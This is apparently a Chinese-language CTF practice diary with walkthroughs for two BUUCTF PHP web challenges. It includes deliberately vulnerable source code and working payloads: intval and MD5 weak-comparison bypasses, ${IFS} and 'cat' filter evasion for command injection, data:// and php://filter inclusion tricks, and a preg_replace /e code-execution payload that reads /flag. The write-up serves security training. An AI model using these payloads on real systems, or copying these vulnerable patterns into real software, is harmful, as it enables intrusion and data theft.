【BUU刷题日记】——第二周

一、[WUSTCTF2020]朴实无华 1

目录爆破

使用dirsearch扫描发现没有结果，因为如果dirsearch请求过快则会导致超出服务器最大请求，扫描不出本来可以访问的目录，所以需要调小线程数：
```
python dirsearch.py -u http://d8149651-49cb-4573-a1f7-1fbc8b1ab946.node4.buuoj.cn:81/ -t 30
```

访问

抓包一下：

直接访问，会出现一堆中文乱码，使用火狐修复一下变成下图：

<img src="/img.jpg">
<?php
header('Content-type:text/html;charset=utf-8');
error_reporting(0);
highlight_file(__file__);


//level 1
if (isset($_GET['num'])){
    $num = $_GET['num'];
    if(intval($num) < 2020 && intval($num + 1) > 2021){
        echo "我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.</br>";
    }else{
        die("金钱解决不了穷人的本质问题");
    }
}else{
    die("去非洲吧");
}
//level 2
if (isset($_GET['md5'])){
   $md5=$_GET['md5'];
   if ($md5==md5($md5))
       echo "想到这个CTFer拿到flag后, 感激涕零, 跑去东澜岸, 找一家餐厅, 把厨师轰出去, 自己炒两个拿手小菜, 倒一杯散装白酒, 致富有道, 别学小暴.</br>";
   else
       die("我赶紧喊来我的酒肉朋友, 他打了个电话, 把他一家安排到了非洲");
}else{
    die("去非洲吧");
}

//get flag
if (isset($_GET['get_flag'])){
    $get_flag = $_GET['get_flag'];
    if(!strstr($get_flag," ")){
        $get_flag = str_ireplace("cat", "wctf2020", $get_flag);
        echo "想到这里, 我充实而欣慰, 有钱人的快乐往往就是这么的朴实无华, 且枯燥.</br>";
        system($get_flag);
    }else{
        die("快到非洲了");
    }
}else{
    die("去非洲吧");
}
?>

观察源码可以发现，要想得到flag需要进行三次绕过。

第一关

需要满足：
```
intval($num) < 2020 && intval($num + 1) > 2021
```
可以使用科学计数法，使num=2e4，intval函数的处理num会认为num为字符串，从第一个数字开始转换，直到遇到非数字。但是num+1运算时会将num作为科学计数法。
```
$num=2e4
intval($num)=2
intval($num+1)=20001
```
第二关

需要满足：
```
$md5==md5($md5)
```
只需要$md字符串开头为0e，并且md5($md5)后开头也为0e，这样php中弱等于就会将其作为科学计数法，0==0。
```
$md5=0e215962017
```
第三关

两个条件：
```
!strstr($get_flag," ")
$get_flag = str_ireplace("cat", "wctf2020", $get_flag);
```
需要$get_flag中不包含空格，不包含cat。

对于空格的规避可以使用：${IFS}、$IFS$1

对于cat的规避可以使用：ca\t、tac、more

总结

目录爆破在有些情况下需要调小线程才能爆破成功
php intval函数的漏洞
php 在md5函数情况下的等号漏洞
linux规避空格、关键词过滤

二、[BJDCTF2020]ZJCTF，不过如此

代码：

<?php

error_reporting(0);
$text = $_GET["text"];
$file = $_GET["file"];
if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){
        die("Not now!");
    }

    include($file);  //next.php
    
}
else{
    highlight_file(__FILE__);
}
?>

file_get_contents:把文件中的内容读入字符串。

利用

对于文件读取的协议可以使用data伪协议，它是一个数据流封装协议，从php5.2.0开始生效

构造payload:
```
?text=data://text/plain,I have a dream
或者
?text=data://text/plain;base64,SSBoYXZlIGEgZHJlYW0=
```
下面的变量file提示查看next.php，文件包含使用php伪协议，payload如下：
```
?text=data://text/plain;base64,SSBoYXZlIGEgZHJlYW0=&file=php://filter/convert.base64-encode/resource=next.php
```
得到的base64字符串解密后：
```
<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;

function complex($re, $str) {
    return preg_replace(
        '/(' . $re . ')/ei',
        'strtolower("\\1")',
        $str
    );
}


foreach($_GET as $re => $str) {
    echo complex($re, $str). "\n";
}

function getFlag(){
	@eval($_GET['cmd']);
}
```
- preg_replace函数：
```
preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit = -1 [, int &$count ]] ) : mixed
```
  其中，$pattern 参数是一个用于匹配的正则表达式，$replacement 参数是替换的字符串，$subject 参数是需要进行替换的原字符串。$limit 参数表示最多替换的次数（默认为 -1，表示不限制替换次数），$count 参数是一个用于存储实际替换次数的变量（可选）。
  
  上面的代码就是通过变量$re中的模式匹配，将$str中匹配到的字符串转化为小写。
- /e漏洞：
  
  在preg_replace的/e模式下，会将替换字符串当做php代码来执行，这样就可以调用getFlag()函数进行命令行操作。
```
$str = '1 2 3 4 5';
$result = preg_replace('/\d+/e', 'pow($0, 2)', $str);
echo $result; // 输出 1 4 9 16 25
```
  这段代码就是将$str中的变量全部平方。$0代表匹配到的字符串，也就是数字本身。
  
  在本题中，替换字符串部分为'strtolower("\\1")'，其中\1等价于$1，代表匹配到的第一个字符串。整个含义就是将匹配到的第一个字符串全变成小写。
- foreach：
  
  表示把$GET数组中键值赋值给$re，单元值赋值给$str。
- payload:
  
  因为模式串中为$re的值所以GET传入的变量名应该为?.*，因为.用于匹配除了\n的其他任意字符。但是使用GET传入变量时.会被过滤成_，因此换用其他表达式/S*。
  
  同时其值应该为${getFlag()}用于执行getFlag函数，cmd的值为system('cat /flag')。
```
?\S*=${getFlag()}&cmd=system('cat /flag');
//分号不能丢
```
  其实不太明白为什么要加*号，网上对${}里面的函数调用也描述很少，先记下来。